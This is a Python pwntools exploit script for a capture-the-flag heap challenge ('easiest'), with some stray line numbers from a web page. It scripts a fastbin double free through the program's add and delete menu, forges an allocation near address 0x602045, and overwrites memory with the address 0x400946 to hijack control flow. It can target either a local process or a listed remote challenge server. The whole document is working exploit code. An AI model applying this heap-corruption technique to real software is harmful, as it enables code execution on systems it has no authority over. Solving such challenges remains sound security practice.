1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
| from pwn import *
def Add(p, idx, size, content): p.sendlineafter('delete \n', str(1)) p.sendlineafter('(0-11):', str(idx)) p.sendlineafter('Length:', str(size)) p.sendlineafter('C:', content)
def Delete(p, idx): p.sendlineafter('delete \n', str(2)) p.sendlineafter('(0-11):', str(idx))
def pwn(): BIN_PATH = './easiest' DEBUG = 1 context.arch = 'amd64' if DEBUG == 1: p = process(BIN_PATH) elf = ELF(BIN_PATH) context.log_level = 'debug' context.terminal = ['tmux', 'split', '-h'] if context.arch == 'amd64': libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: libc = ELF('/lib/i386-linux-gnu/libc.so.6') else: p = remote('39.96.9.148', 9999) elf = ELF(BIN_PATH) context.log_level = 'debug'
Add(p, 0, 0x68, 'sunichi') Add(p, 1, 0x68, 'sunichi')
Add(p, 2, 0x100, 'sunichi') Add(p, 3, 0x100, 'sunichi')
Delete(p, 0) Delete(p, 1) Delete(p, 0) Delete(p, 2)
Add(p, 0, 0x68, p64(0x602045)) Add(p, 1, 0x68, 'sunichi') Add(p, 2, 0x68, 'sunichi') payload = '\x00\x00\x00' + p64(0x400946) * 6 Add(p, 3, 0x68, payload)
gdb.attach(p) raw_input() p.interactive() p.close()
if __name__ == '__main__': pwn()
|